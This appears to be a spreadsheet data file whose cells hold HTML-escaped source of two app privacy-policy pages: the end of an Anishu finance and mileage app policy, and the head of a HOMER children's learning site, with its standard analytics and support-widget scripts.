#0400;mso-bidi-language:#0400'&gt;Automatically Collected Information&lt;/span&gt;&lt;/b&gt;&lt;b_x005F_x000D_
style='mso-bidi-font-weight:normal'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;&amp;nbsp;When You Use The_x005F_x000D_
Application&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
 #0400;mso-bidi-language:#0400'&gt;In addition, the Application may collect certain_x005F_x000D_
information automatically, including, but not limited to the type of mobile device you use,_x005F_x000D_
 your mobile devices unique device ID, and your_x005F_x000D_
mobile operating system.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-langua_x005F_x000D_
ge:#0400;mso-bidi-language:#0400'&gt;When you sign up for Cloud Sync with the Finances application, we collect your email address.</t>
  </si>
  <si>
    <t xml:space="preserve">In addition, when using this service, we store the latest backup data and the as well as the entries you make in the application on our servers. This information is accessible only from your devices over a secure HTTPS connection.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;Does the Application_x005F_x000D_
collect precise real time location information of the device?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;When you use the mileage tacking applications, we use GPS_x005F_x000D_
technology (or other similar technology) to determine your current location in_x005F_x000D_
order to determine the start and stop points for your vehicle. Such information_x005F_x000D_
is recorded within the application and presented to you via the user interface._x005F_x000D_
</t>
  </si>
  <si>
    <t>In addition, we may log such information to help improve the working of the_x005F_x000D_
determination algorithm. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;We will not share your current location with_x005F_x000D_
other users or partners. If you do not want us to use your location for the_x005F_x000D_
purposes set forth above, you should turn off the location services for the_x005F_x000D_
mobile application located in your account settings or in your mobile phone_x005F_x000D_
settings and/or within the mobile application.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;Do third parties see and/or_x005F_x000D_
have access to information obtained by the Application?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;We may share your information only in the ways_x005F_x000D_
that are described in this privacy statement. We may disclose User Provided and_x005F_x000D_
Automatically Collected Information:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in;text-indent:-14.5pt;mso-list:l0 level1 lfo1'&gt;&lt;![if ! supportLists]&gt;&lt;span_x005F_x000D_
style='font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:_x005F_x000D_
Symbol;mso-ansi-language:#0400;mso-fareast-language:#0400;mso-bidi-language:_x005F_x000D_
#0400'&gt;&lt;span style='mso-list:Ignore'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;![endif]&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;as required by law, such as to comply with a_x005F_x000D_
subpoena, or similar legal process;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in;text-indent:-14.5pt;mso-list:l0 level1 lfo1'&gt;&lt;![if !</t>
  </si>
  <si>
    <t xml:space="preserve">supportLists]&gt;&lt;span_x005F_x000D_
style='font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:_x005F_x000D_
Symbol;mso-ansi-language:#0400;mso-fareast-language:#0400;mso-bidi-language:_x005F_x000D_
#0400'&gt;&lt;span style='mso-list:Ignore'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;![endif]&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;when we believe in good faith that disclosure is_x005F_x000D_
necessary to protect our rights, protect your safety or the safety of others,_x005F_x000D_
investigate fraud, or respond to a&amp;nbsp;government request;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;What are my opt-out rights?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
</t>
  </si>
  <si>
    <t>#0400;mso-bidi-language:#0400'&gt;You can stop all collection of information by_x005F_x000D_
the Application easily by uninstalling the Application. You may use the_x005F_x000D_
standard uninstall processes as may be available as part of your mobile device_x005F_x000D_
or via the mobile application marketplace or network. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;Data Retention Policy,_x005F_x000D_
Managing Your Information&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;We will retain User Provided data for as long as_x005F_x000D_
you use the Application and for a reasonable time thereafter.</t>
  </si>
  <si>
    <t>We will retain_x005F_x000D_
Automatically Collected information for up to 24 months&amp;nbsp;and thereafter may_x005F_x000D_
store it in aggregate. If you'd like us to delete User Provided Data that you_x005F_x000D_
have provided via the Application, please contact us at&amp;nbsp;support@anishu.com&amp;nbsp;and_x005F_x000D_
we will respond in a reasonable time. Please note that some or all of the User_x005F_x000D_
Provided Data may be required in order for the Application to function_x005F_x000D_
properly.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;Security&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;We are concerned about safeguarding the_x005F_x000D_
confidentiality of your information.</t>
  </si>
  <si>
    <t>We provide physical, electronic, and_x005F_x000D_
procedural safeguards to protect information we process and maintain. For_x005F_x000D_
example, we limit access to this information to authorized employees and_x005F_x000D_
contractors who need to know that information in order to operate, develop or_x005F_x000D_
improve our Application. Please be aware that, although we endeavor provide_x005F_x000D_
reasonable security for information we process and maintain, no security system_x005F_x000D_
can prevent all potential security breaches.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;Changes&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;This Privacy Policy may be updated from time to_x005F_x000D_
time for any reason.</t>
  </si>
  <si>
    <t>We will notify you of any changes to our Privacy Policy by_x005F_x000D_
posting the new Privacy Policy&amp;nbsp;here. You are advised to consult this_x005F_x000D_
Privacy Policy regularly for any changes, as continued use is deemed approval_x005F_x000D_
of all changes.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;Your Consent&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;By using the Application, you are consenting to_x005F_x000D_
our processing of your information as set forth in this Privacy Policy now and_x005F_x000D_
as amended by us.</t>
  </si>
  <si>
    <t>&amp; quot;Processing&amp;quot;, means using cookies on a computer/hand_x005F_x000D_
held device or using or touching information in any way, including, but not_x005F_x000D_
limited to, collecting, storing, deleting, using, combining and disclosing_x005F_x000D_
information, all of which activities will take place in the United States. If_x005F_x000D_
you reside outside the United States&amp;nbsp;your information will be transferred,_x005F_x000D_
processed and stored there under United States&amp;nbsp;privacy standards.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;Contact us&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;If you have any questions regarding privacy_x005F_x000D_
while using the Application, or have questions about our practices, please_x005F_x000D_
contact us via email at support@anishu.com.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
								&lt;/div&gt;_x005F_x000D_
							&lt;/div&gt;_x005F_x000D_
						&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
&lt;div id="push"&gt;&lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
					&lt;div class="contact-us  text-center"&gt;_x005F_x000D_
						&lt;footer&gt;_x005F_x000D_
							&lt;div class="fwhite"&gt;_x005F_x000D_
								&lt;p&gt;Copyright &amp;copy; 2017 &lt;a href="#"&gt;Anishu, Inc.&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
							&lt;/div&gt;_x005F_x000D_
						&lt;/footer&gt;_x005F_x000D_
					&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
					&lt;!-- Javascript files --&gt;_x005F_x000D_
					&lt;!-- jQuery --&gt;_x005F_x000D_
					&lt;script src="js/jquery.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!--</t>
  </si>
  <si>
    <t>Bootstrap JS --&gt;_x005F_x000D_
					&lt;script src="js/bootstrap.min.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!-- Pretty Photos --&gt;_x005F_x000D_
					&lt;script src="js/jquery.prettyPhoto.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!-- Arbitrary Anchor JS --&gt;_x005F_x000D_
					&lt;script type="text/javascript" src="js/jquery.arbitrary-anchor.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!--</t>
  </si>
  <si>
    <t>Sticky --&gt;_x005F_x000D_
					&lt;script src="js/jquery.sticky.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!-- Way Points--&gt;_x005F_x000D_
					&lt;script src="js/waypoints.min.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!-- Respond JS for IE8 --&gt;_x005F_x000D_
					&lt;script src="js/respond.min.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">HTML5 Support for IE --&gt;_x005F_x000D_
					&lt;script src="js/html5shiv.js"&gt;&lt;/script&gt;_x005F_x000D_
					&lt;!-- Custom JS --&gt;_x005F_x000D_
					&lt;script src="js/custom.js"&gt;&lt;/script&gt;_x005F_x000D_
					 &lt;script src="js/jqBootstrapValidation.js"&gt;&lt;/script&gt;_x005F_x000D_
 &lt;script src="./js/contact_me.js"&gt;&lt;/script&gt;_x005F_x000D_
				&lt;/body&gt;	_x005F_x000D_
				&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html class="no-js "&gt;
&lt;head&gt;
  &lt;meta charset="utf-8"&gt;
  &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
  &lt;meta name="msvalidate.01" content="CD71DB00AAD74EB8DADEB3DA65AAEAF9"&gt;
  &lt;meta name="robots" content="index, follow"&gt;
  &lt;meta name="security" content="Public"&gt;
  &lt;meta name="owner" content="HomerLearning, Inc."&gt;
  &lt;meta name="fragment" content="!"&gt;
  &lt;title&gt;HOMER | The Essential Early Learning Program and App for Kids 2-8&lt;/title&gt;
  &lt;meta name="description" content=""&gt;
  &lt;meta name="keywords" content="learn to read, learn to read program, learn to read app, Homer, app, preschool games, preschool activities, kids reading app, literacy, literacy skills, kindergarten app, preschool stories, nursery rhymes, common core reading, kindergarten games, kindergarten activities, reading app, early childhood learning. phonics, games, phonics kids, play phonics, kindergarten books, best kids apps, poetry, fables, folklore, stories, stories for kids, child development, bedtime stories, short bedtime stories for kids, fairy tales, nursery rhymes and songs, songs for kids"&gt;
  &lt;meta name="viewport" content="initial-scale=1.0, width=device-width"&gt;
  &lt;meta property="og:type" content="product"&gt;
  &lt;meta property="og:url" content="https://learnwithhomer.com"&gt;
  &lt;meta property="og:image" content="https://site-static.learnwithhomer.com/static/redesign2/img/HOMER_for_Meta.186568aa6b9d.jpg"&gt;
  &lt;meta property="og:site_name" content="HOMER"&gt;
  &lt;meta property="og:description" content=""&gt;
  &lt;meta property="og:title" content="HOMER"&gt;
  &lt;meta name="p:domain_verify" content="95d361f0490aa63656c005f7f917d068"&gt;
  &lt;meta name="blitz" content="mu-a2bee2da-a90e7d6d-6f4a277d-bd892b63"&gt;
  &lt;meta name="aws" content="true"&gt;
  &lt;meta name="apple-itunes-app" content="app-id=601437586, app-argument=/privacy/"&gt;
  &lt;meta name="google-site-verification" content="GEM6umnNww8RQSKGuUUosbDUEEUUHFQ9TkW3P5a7EIU" /&gt;
  &lt;link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"&gt;
  &lt;link rel="stylesheet" href="//cdn.jsdelivr.net/normalize/3.0.3/normalize.min.css"&gt;
  &lt;link rel="stylesheet" type="text/css" href="https://cloud.typography.com/7496996/6482372/css/fonts.css" /&gt;
  &lt;link href="https://site-static.learnwithhomer.com/static/fonts/raleway-homer/stylesheet.c49c723abfc5.css" rel="stylesheet" type="text/css"&gt;
  &lt;link href="https://site-static.learnwithhomer.com/static/redesign/flexboxgrid.37e217af72a2.css" type="text/css" rel="stylesheet" /&gt;
  &lt;link href="https://site-static.learnwithhomer.com/static/redesign/stylesheets/main.f2ef7f51c521.css" type="text/css" rel="stylesheet" /&gt;
  &lt;link rel="apple-touch-icon" sizes="180x180" href="https://site-static.learnwithhomer.com/static/img/apple-touch-icon.26fb726b664b.png"&gt;
  &lt;link rel="icon" type="image/png" sizes="32x32" href="https://site-static.learnwithhomer.com/static/img/favicon-32x32.e0d4dad19ef7.png"&gt;
  &lt;link rel="icon" type="image/png" sizes="16x16" href="https://site-static.learnwithhomer.com/static/img/favicon-16x16.6ba5ca552006.png"&gt;
  &lt;link rel="manifest" href="https://site-static.learnwithhomer.com/static/manifest.33171f7577cf.json"&gt;
  &lt;meta name="apple-mobile-web-app-title" content="Homer"&gt;
  &lt;meta name="application-name" content="Homer"&gt;
  &lt;meta name="theme-color" content="#ffffff"&gt;
  &lt;link rel="shortcut icon" href="https://site-static.learnwithhomer.com/static/img/favicon.b54d5ea999ab.ico" /&gt;
  &lt;link rel="apple-touch-icon-precomposed" href="https://site-static.learnwithhomer.com/static/img/apple-touch-icon-precomposed.992e4dff8494.png"/&gt;
  &lt;link rel="apple-touch-icon" sizes="72x72" href="https://site-static.learnwithhomer.com/static/img/apple-touch-icon-72x72-precomposed.992e4dff8494.png" /&gt;
  &lt;link rel="apple-touch-icon" sizes="114x114" href="https://site-static.learnwithhomer.com/static/img/apple-touch-icon-114x114-precomposed.bd139ec50e46.png" /&gt;
  &lt;link rel="apple-touch-icon" sizes= "144x144" href="https://site-static.learnwithhomer.com/static/img/apple-touch-icon-114x114-precomposed.bd139ec50e46.png" /&gt;
  &lt;link rel="canonical" href="https://site/privacy/" /&gt;
&lt;link href='//fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'&gt;
&lt;link rel="stylesheet" href="https://site-static.learnwithhomer.com/static/stylesheets/old_main.642260dd161b.css" /&gt;
  &lt;script&gt;var doc = document.documentElement;doc.setAttribute('data-useragent', navigator.userAgent);&lt;/script&gt;
  &lt;script type="text/javascript" src="//npmcdn.com/parse@2.1.0/dist/parse.min.js"&gt;&lt;/script&gt;
  &lt;script&gt;Parse.initialize("8nyG46QswpUa2YidGVrZj5S9WupfmPwmNbCFEvOL", "s8mTVnOsGh3VTXirGGB8hPeKKiXSN7qUCEOZK3Mc"); Parse.serverURL = "https://parse-production.learnwithhomer.com/parse";&lt;/script&gt;
&lt;!-- Start of homerlearning Zendesk Widget script --&gt;
&lt;meta name="google-site-verification" content="G4QUdrwlSvGJyKscjhp0-oWUoxxqb2EMAP27NBUcLe0" /&gt;
&lt;script&gt;
window.zEmbed||function(e,t){var n,o,d,i,s,a=[],r=document.createElement("iframe");window.zEmbed=function()
{a.push(arguments)}
,window.zE=window.zE||window.zEmbed,r.src="javascript:false",r.title="",r.role="presentation",(r.frameElement||r).style.cssText="display: none",d=document.getElementsByTagName("script"),d=d[d.length-1],d.parentNode.insertBefore(r,d),i=r.contentWindow,s=i.document;try
{o=s}
catch(c)
{n=document.domain,r.src='javascript:var d=document.open();d.domain="'+n+'";void(0);',o=s}
o.open()._l=function()
{var o=this.createElement("script");n&amp;&amp;(this.domain=n),o.id="js-iframe-async",o.src=e,this.t=+new Date,this.zendeskHost=t,this.zEQueue=a,this.body.appendChild(o)}
,o.write('&lt;body onload="document._l();"&gt;'),o.close()
    ("https://assets.zendesk.com/embeddable_framework/main.js","homerlearning.zendesk.com")
};
&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End of homerlearning Zendesk Widget script --&gt;
&lt;script type="text/javascript"&gt;
    var KM_COOKIE_DOMAIN = "learnwithhomer.com";
      var _kmk = _kmk || ' 6cf1af94a45d326c44e2185359ad7803515956ce';
    var _kmq</t>
  </si>
  <si>
    <t>Tatari Code Snippet --&gt;
    &lt;script&gt;
      ! function(){try{!function(t,n){if(!n.version){window.tatari=n,n.init=function(t,e){var i=function(t,e){n[e]=function()
      {t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};"track pageview identify".split(" ").forEach(function(t)
      {i(n,t)}),n._i=t,n.pageview()},n.version="latest";var e=t.createElement("script");e.type="text/javascript",e.async=!0,
      e.src="https://d2hrivdxn8ekm8.cloudfront.net/tracker-latest.min.js";var i=t.getElementsByTagName("script")[0];
      i.parentNode.insertBefore(e,i)}}(document,window.tatari||[])}catch(t){console.log(t)}}(); 
      tatari.init('bc67a2e0-4bf8-4b24-bc41-aa69a0462698');
    &lt;/script&gt;
    &lt;!-- End Tatari Code Snippet --&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager --&gt;
    &lt;script&gt;
      var gtmId = 'GTM-NVJHN4';
      (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
      new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
       j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
      '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
      })(window,document,'script','dataLayer',gtmId);
    &lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager --&gt;
  &lt;script type="text/javascript"&gt;
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
    var uid = 'UA-37205474-1';
    ga('require', 'linker');
      ga('create', uid, 'auto');
      ga('linker:autoLink', ["learnwithhomer.com"]);
    ga('require', 'linkid', 'linkid.js');
      ga('require', 'displayfeatures');
    ga('set', 'anonymizeIp', true);
    ga('send', 'pageview', {'dimension1': 'no'});
    window.optimizely = window.optimizely || [];
    window['optimizely'].push(["customTag","plan_count",3])
    window.RENDER_RESOLUTION = (window.devicePixelRatio &amp;&amp; window.devicePixelRatio &gt;= 2) ?</t>
  </si>
  <si>
    <t>2 : 1;
  &lt;/script&gt;
  &lt;script src="//cdn.optimizely.com/js/1621321878.js"&gt;&lt;/script&gt;
  &lt;script type="text/javascript"&gt;
    /* &lt;! [CDATA[ */
    var google_conversion_id = 1005501346;
    var google_custom_params = window.google_tag_params;
    var google_remarketing_only = true;
    /* ]]&gt; */
  &lt;/script&gt;
    &lt;script&gt;
      window.fbAsyncInit = function() {
        Parse.FacebookUtils.init({
          appId: '121772404675702',
          status: true,  // check Facebook Login status
          cookie: true,  // enable cookies to allow Parse to access the session
          xfbml: true,  // initialize Facebook social plugins on the page
          version: 'v2.8' // point to the latest Facebook Graph API version
        });
      };
      (function(d, s, id){
        var js, fjs = d.getElementsByTagName(s)[0];
        if (d.getElementById(id)) {return;}
        js = d.createElement(s);</t>
  </si>
  <si>
    <t xml:space="preserve">js.id = id;
        js.src = "//connect.facebook.net/en_US/sdk.js";
        fjs.parentNode.insertBefore(js, fjs);
      }(document, 'script', 'facebook-jssdk'));
    &lt;/script&gt;
    &lt;script src="https://site-static.learnwithhomer.com/static/js/homer/facebook-login.f02d2e3ec464.js"&gt;&lt;/script&gt;
  &lt;script&gt;
    window['friendbuy'] = window['friendbuy'] || [];
    window['friendbuy'].push(['site', 'site-e0ae760b-learnwithhomer.com']);
    (function (f, r, n, d, b, y) {b = f.createElement(r), y = f.getElementsByTagName(r)[0];b.async = 1;b.src = n;y.parentNode.insertBefore(b, y);})(document, 'script', '//djnf6e5yyirys.cloudfront.net/js/friendbuy.min.js');
  &lt;/script&gt;
  &lt;!-- Hotjar Tracking Code for https://learnwithhomer.com/ --&gt;
  &lt;script&gt;
      (function(h,o,t,j,a,r){
          h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
          h._hjSettings={hjid:635645,hjsv:6};
          a=o.getElementsByTagName('head')[0];
          r=o.createElement('script');r.async=1;
          r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
          a.appendChild(r);
      })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');
  &lt;/script&gt;
  &lt;script&gt;
    (function(h,o,u,n,d) {
      h=h[d]=h[d]||{q:[],onReady:function(c){h.q.push(c)}}
      d=o.createElement(u);d.async=1;d.src=n
      n=o.getElementsByTagName(u)[0];n.parentNode.insertBefore(d,n)
    })(window,document,'script','https://www.datadoghq-browser-agent.com/datadog-rum.js','DD_RUM')
    </t>
  </si>
  <si>
    <t xml:space="preserve">DD_RUM.onReady(function() {
      DD_RUM.init({
        clientToken: 'pubc9e54b372638e457cd58e10e5e0e2b52',
        applicationId: '861c1b8a-da70-4d07-a150-16f8aedb7e98',
        site: 'datadoghq.com',
        service: 'Homer Web (django)',
        env: 'production',
        //  version: '1.0.0',
        sampleRate: 100,
        trackInteractions: true,
      })
    })
  &lt;/script&gt;
&lt;/head&gt;
&lt;body class=" "&gt;
  &lt;!-- Google Tag Manager --&gt;
  &lt;noscript&gt;
      &lt;iframe src="//www.googletagmanager.com/ns.html?id=GTM-NVJHN4" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;
  &lt;/noscript&gt;
  &lt;!-- End Google Tag Manager --&gt;
  &lt;script&gt;
    var isIOSWebView = false;
    </t>
  </si>
  <si>
    <t>var isAndroid = false;
    var parseSessionToken = "None";
  &lt;/script&gt;
  &lt;div id="alert-div"&gt;&lt;/div&gt;
      &lt;div id="PageWrapper" class="funnel"&gt;
          &lt;header id="Header"&gt;
            &lt;div class="content"&gt;
              &lt;div class="menu"&gt;
                    &lt;a href="/" aria-label="Homer Learning"&gt;&lt;div class="header-logo"&gt;&lt;/div&gt;&lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/header&gt;
    &lt;main id="Main" class="old_styles"&gt;
  	&lt;div class="main-container clearfix privacyTemplate"&gt;
&lt;h1 align="center"&gt;&lt;strong&gt;Privacy Policy&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Last Revised: February 17, 2022&lt;/p&gt;
&lt;p&gt; This Privacy Policy (“&lt;strong&gt;Privacy Policy&lt;/strong&gt;”) describes how we collect, use, and disclose information in connection with the use of all websites, applications, and other online products and services provided by us that link to this Privacy Policy, including &lt;a href="http://www.learnwithhomer.com/"&gt;www.learnwithhomer.com&lt;/a&gt; (and all related subdomains) (the “&lt;strong&gt;Site&lt;/strong&gt;”) and the HOMER Learn &amp;amp; Grow, Learn &amp;amp; Play by Fisher-Price and Learn with Sesame Street mobile applications (the “&lt;strong&gt;Mobile Applications&lt;/strong&gt;”) and related online and offline services thereto, including any services, transactions, or engagement you might have with us (collectively, the “&lt;strong&gt;Services&lt;/strong&gt;”) by you and the children who use your account to access the Services.&lt;/p&gt;
